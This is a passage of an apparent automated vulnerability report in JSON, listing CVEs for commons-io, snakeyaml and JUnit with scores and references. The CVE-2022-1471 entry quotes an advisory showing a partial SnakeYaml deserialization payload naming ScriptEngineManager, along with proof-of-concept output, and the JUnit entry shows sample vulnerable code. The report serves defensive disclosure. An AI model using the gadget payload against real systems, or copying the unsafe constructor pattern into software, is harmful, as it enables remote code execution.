List","url":"https://lists.apache.org/thread.html/r8569a41d565ca880a4dee0e645dad1cd17ab4a92e68055ad9ebb7375@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r86528f4b7d222aed7891e7ac03d69a0db2a2dfa17b86ac3470d7f374@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r873d5ddafc0a68fd999725e559776dc4971d1ab39c0f5cc81bd9bc04@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8bfc7235e6b39d90e6f446325a5a44c3e9e50da18860fdabcee23e29@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8efcbabde973ea72f5e0933adc48ef1425db5cde850bf641b3993f31@%3Cdev.commons.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r92ea904f4bae190b03bd42a4355ce3c2fbe8f36ab673e03f6ca3f9fa@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra8ef65aedc086d2d3d21492b4c08ae0eb8a3a42cc52e29ba1bc009d8@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/raa053846cae9d497606027816ae87b4e002b2e0eb66cb0dee710e1f5@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rad4ae544747df32ccd58fff5a86cd556640396aeb161aa71dd3d192a@%3Cuser.commons.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbebd3e19651baa7a4a5503a9901c95989df9d40602c8e35cb05d3eb5@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc10fa20ef4d13cbf6ebe0b06b5edb95466a1424a9b7673074ed03260@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc2dd3204260e9227a67253ef68b6f1599446005bfa0e1ddce4573a80@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc359823b5500e9a9a2572678ddb8e01d3505a7ffcadfa8d13b8780ab%40%3Cuser.commons.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc5f3df5316c5237b78a3dff5ab95b311ad08e61d418cd992ca7e34ae@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc65f9bc679feffe4589ea0981ee98bc0af9139470f077a91580eeee0@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rca71a10ca533eb9bfac2d590533f02e6fb9064d3b6aa3ec90fdc4f51@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd09d4ab3e32e4b3a480e2ff6ff118712981ca82e817f28f2a85652a6@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re41e9967bee064e7369411c28f0f5b2ad28b8334907c9c6208017279@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/red3aea910403d8620c73e1c7b9c9b145798d0469eb3298a7be7891af@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfa2f08b7c0caf80ca9f4a18bd875918fdd4e894e2ea47942a4589b9c@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfcd2c649c205f12b72dde044f905903460669a220a2eb7e12652d19d@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfd01af05babc95b8949e6d8ea78d9834699e1b06981040dde419a330@%3Cdev.commons.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/08/msg00016.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-29425"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-29425"},{"summary":"NetApp Advisory ntap-20220210-0004","url":"https://security.netapp.com/advisory/ntap-20220210-0004"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":4.8,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":4.8,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":4.8,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N","version":"3.1"},"products":["commons-io/commons-io@vers:maven/>=0.1|<=2.6"]}],"title":"CVE-2021-29425/pkg:maven/commons-io/commons-io@2.5?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-25857"]}],"cve":"CVE-2022-25857","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-08-31T00:00:24","ids":[{"system_name":"CVE Record","text":"CVE-2022-25857"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-ORGYAML-2806360"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0010"}],"notes":[{"audience":"developers","category":"other","text":"Improper Restriction of Recursive Entity References in DTDs","title":"Additional CWE: 776"},{"category":"description","details":"Vulnerability Description","text":"Uncontrolled Resource Consumption in snakeyaml"},{"category":"details","details":"Vulnerability Details","text":"# Uncontrolled Resource Consumption in snakeyaml The package org.yaml:snakeyaml from 0 and before 1.31 are vulnerable to Denial of Service (DoS) due missing to nested depth limitation for collections."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"],"known_not_affected":["org.yaml/snakeyaml@1.31"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25857"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25857"},{"summary":"NetApp Advisory ntap-20240315-0010","url":"https://security.netapp.com/advisory/ntap-20240315-0010"},{"summary":"Snyk Advisory SNYK-JAVA-ORGYAML-2806360","url":"https://security.snyk.io/vuln/SNYK-JAVA-ORGYAML-2806360"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"]}],"title":"CVE-2022-25857/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-38751"]}],"cve":"CVE-2022-38751","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-06T00:00:27","ids":[{"system_name":"CVE Record","text":"CVE-2022-38751"},{"system_name":"Gentoo Advisory","text":"glsa-202305-28"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0010"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write"},{"category":"details","details":"Vulnerability Details","text":"# snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"],"known_not_affected":["org.yaml/snakeyaml@1.31"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38751"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38751"},{"summary":"Gentoo Advisory glsa-202305-28","url":"https://security.gentoo.org/glsa/202305-28"},{"summary":"NetApp Advisory ntap-20240315-0010","url":"https://security.netapp.com/advisory/ntap-20240315-0010"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"]}],"title":"CVE-2022-38751/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-38752"]}],"cve":"CVE-2022-38752","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-06T00:00:27","ids":[{"system_name":"CVE Record","text":"CVE-2022-38752"},{"system_name":"Gentoo Advisory","text":"glsa-202305-28"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0009"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"snakeYAML before 1.32 vulnerable to Denial of Service due to Out-of-bounds Write"},{"category":"details","details":"Vulnerability Details","text":"# snakeYAML before 1.32 vulnerable to Denial of Service due to Out-of-bounds Write Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DoS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack-overflow."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.31"],"known_not_affected":["org.yaml/snakeyaml@1.32"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38752"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38752"},{"summary":"Gentoo Advisory glsa-202305-28","url":"https://security.gentoo.org/glsa/202305-28"},{"summary":"NetApp Advisory ntap-20240315-0009","url":"https://security.netapp.com/advisory/ntap-20240315-0009"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.31"]}],"title":"CVE-2022-38752/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-38749"]}],"cve":"CVE-2022-38749","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-06T00:00:27","ids":[{"system_name":"Arxiv Advisory","text":"2306"},{"system_name":"CVE Record","text":"CVE-2022-38749"},{"system_name":"Gentoo Advisory","text":"glsa-202305-28"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0010"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write"},{"category":"details","details":"Vulnerability Details","text":"# snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"],"known_not_affected":["org.yaml/snakeyaml@1.31"]},"references":[{"summary":"Arxiv Advisory 2306","url":"https://arxiv.org/pdf/2306.05534.pdf"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38749"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38749"},{"summary":"Gentoo Advisory glsa-202305-28","url":"https://security.gentoo.org/glsa/202305-28"},{"summary":"NetApp Advisory ntap-20240315-0010","url":"https://security.netapp.com/advisory/ntap-20240315-0010"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"]}],"title":"CVE-2022-38749/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-38750"]}],"cve":"CVE-2022-38750","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-06T00:00:27","ids":[{"system_name":"CVE Record","text":"CVE-2022-38750"},{"system_name":"Gentoo Advisory","text":"glsa-202305-28"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0010"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write"},{"category":"details","details":"Vulnerability Details","text":"# snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"],"known_not_affected":["org.yaml/snakeyaml@1.31"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38750"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38750"},{"summary":"Gentoo Advisory glsa-202305-28","url":"https://security.gentoo.org/glsa/202305-28"},{"summary":"NetApp Advisory ntap-20240315-0010","url":"https://security.netapp.com/advisory/ntap-20240315-0010"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"]}],"title":"CVE-2022-38750/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"cve":"CVE-2022-1471","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-12-12T21:19:47","ids":[{"system_name":"CVE Record","text":"CVE-2022-1471"},{"system_name":"GitHub Advisory","text":"GHSA-mjmj-j48q-9wg2"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0015"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0006"}],"notes":[{"audience":"developers","category":"other","text":"Deserialization of Untrusted Data","title":"Additional CWE: 502"},{"category":"description","details":"Vulnerability Description","text":"SnakeYaml Constructor Deserialization Remote Code Execution"},{"category":"details","details":"Vulnerability Details","text":"# SnakeYaml Constructor Deserialization Remote Code Execution ### Summary SnakeYaml's `Constructor` class, which inherits from `SafeConstructor`, allows any type be deserialized given the following line:  new Yaml(new Constructor(TestDataClass.class)).load(yamlContent);  Types do not have to match the types of properties in the target class. A `ConstructorException` is thrown, but only after a malicious payload is deserialized.  ### Severity High, lack of type checks during deserialization allows remote code execution.  ### Proof of Concept Execute `bash run.sh`. The PoC uses Constructor to deserialize a payload for RCE. RCE is demonstrated by using a payload which performs a http request to http://127.0.0.1:8000.  Example output of successful run of proof of concept:  ``` $ bash run.sh  [+] Downloading snakeyaml if needed [+] Starting mock HTTP server on 127.0.0.1:8000 to demonstrate RCE nc: no process found [+] Compiling and running Proof of Concept, which a payload that sends a HTTP request to mock web server. [+] An exception is expected. Exception: Cannot create property=payload for JavaBean=Main$TestDataClass@3cbbc1e0  in 'string', line 1, column 1:   payload: !!javax.script.ScriptEn ...    ^ Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager  in 'string', line 1, column 10:   payload: !!javax.script.ScriptEngineManag ...         ^   at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:291)  at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.construct(Constructor.java:172)  at org.yaml.snakeyaml.constructor.Constructor$ConstructYamlObject.construct(Constructor.java:332)  at org.yaml.snakeyaml.constructor.BaseConstructor.constructObjectNoCheck(BaseConstructor.java:230)  at org.yaml.snakeyaml.constructor.BaseConstructor.constructObject(BaseConstructor.java:220)  at org.yaml.snakeyaml.constructor.BaseConstructor.constructDocument(BaseConstructor.java:174)  at org.yaml.snakeyaml.constructor.BaseConstructor.getSingleData(BaseConstructor.java:158)  at org.yaml.snakeyaml.Yaml.loadFromReader(Yaml.java:491)  at org.yaml.snakeyaml.Yaml.load(Yaml.java:416)  at Main.main(Main.java:37) Caused by: java.lang.IllegalArgumentException: Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager  at java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:167)  at java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:171)  at java.base/jdk.internal.reflect.UnsafeObjectFieldAccessorImpl.set(UnsafeObjectFieldAccessorImpl.java:81)  at java.base/java.lang.reflect.Field.set(Field.java:780)  at org.yaml.snakeyaml.introspector.FieldProperty.set(FieldProperty.java:44)  at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:286)  ... 9 more [+] Dumping Received HTTP Request. Will not be empty if PoC worked GET /proof-of-concept HTTP/1.1 User-Agent: Java/11.0.14 Host: localhost:8000 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive ```  ### Further Analysis Potential mitigations include, leveraging SnakeYaml's SafeConstructor while parsing untrusted content.  See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64581479 for discussion on the subject.  A fix was released in version 2.0. See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64876314 for more information.  ### Timeline **Date reported**: 4/11/2022 **Date fixed**:  **Date disclosed**: 10/13/2022"}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.33"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/175095/PyTorch-Model-Server-Registration-Deserialization-Remote-Code-Execution.html"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/11/19/1"},{"summary":"GitHub Advisory GHSA-mjmj-j48q-9wg2","url":"https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2"},{"summary":"Google Mailing List","url":"https://groups.google.com/g/kubernetes-security-announce/c/mwrakFaEdnc"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-1471"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-1471"},{"summary":"NetApp Advisory ntap-20230818-0015","url":"https://security.netapp.com/advisory/ntap-20230818-0015"},{"summary":"NetApp Advisory ntap-20240621-0006","url":"https://security.netapp.com/advisory/ntap-20240621-0006"},{"summary":"Cve 2022","url":"https://snyk.io/blog/unsafe-deserialization-snakeyaml-java-cve-2022-1471"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"LOW","baseScore":8.3,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.3,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"LOW","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":8.3,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.33"]}],"title":"CVE-2022-1471/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-41854"]}],"cve":"CVE-2022-41854","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-11-11T19:00:31","ids":[{"system_name":"CVE Record","text":"CVE-2022-41854"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0009"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0006"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"Snakeyaml vulnerable to Stack overflow leading to denial of service"},{"category":"details","details":"Vulnerability Details","text":"# Snakeyaml vulnerable to Stack overflow leading to denial of service Those using Snakeyaml to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow. This effect may support a denial of service attack."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.31"]},"references":[{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3DDXEXXWAZGF5AVHIPGFPXIWL6TSMKJE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7MKE4XWRXTH32757H7QJU4ACS67DYDCR"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KSPAJ5Y45A4ZDION2KN5RDWLHK4XKY2J"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3DDXEXXWAZGF5AVHIPGFPXIWL6TSMKJE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7MKE4XWRXTH32757H7QJU4ACS67DYDCR"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSPAJ5Y45A4ZDION2KN5RDWLHK4XKY2J"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41854"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41854"},{"summary":"NetApp Advisory ntap-20240315-0009","url":"https://security.netapp.com/advisory/ntap-20240315-0009"},{"summary":"NetApp Advisory ntap-20240621-0006","url":"https://security.netapp.com/advisory/ntap-20240621-0006"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.31"]}],"title":"CVE-2022-41854/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-15250"]}],"cve":"CVE-2020-15250","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},"discovery_date":"2020-10-12T17:33:00","ids":[{"system_name":"CVE Record","text":"CVE-2020-15250"},{"system_name":"GitHub Advisory","text":"GHSA-269g-pwp5-87pp"},{"system_name":"Junit Advisory","text":"TemporaryFolder"},{"system_name":"Oracle Advisory","text":"cpuapr2022"}],"notes":[{"audience":"developers","category":"other","text":"Incorrect Permission Assignment for Critical Resource","title":"Additional CWE: 732"},{"category":"description","details":"Vulnerability Description","text":"TemporaryFolder on unix-like systems does not limit access to created files"},{"category":"details","details":"Vulnerability Details","text":"# TemporaryFolder on unix-like systems does not limit access to created files ### Vulnerability  The JUnit4 test rule [TemporaryFolder](https://junit.org/junit4/javadoc/4.13/org/junit/rules/TemporaryFolder.html) contains a local information disclosure vulnerability.  Example of vulnerable code: ```java public static class HasTempFolder {   @Rule   public TemporaryFolder folder = new TemporaryFolder();    @Test   public void testUsingTempFolder() throws IOException {     folder.getRoot(); // Previous file permissions: `drwxr-xr-x`; After fix:`drwx------`     File createdFile= folder.newFile(\"myfile.txt\"); // unchanged/irrelevant file permissions     File createdFolder= folder.newFolder(\"subfolder\"); // unchanged/irrelevant file permissions     // ...   } } ```  ### Impact  On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system.  This vulnerability **does not** allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability.  When analyzing the impact of this vulnerability, here are the important questions to ask:  1. Do the JUnit tests write sensitive information, like API keys or passwords, into the temporary folder?   - If yes, this vulnerability impacts you, but only if you also answer 'yes' to question 2.   - If no, this vulnerability does not impact you. 2. Do the JUnit tests ever execute in an environment where the OS has other untrusted users.    _This may apply in 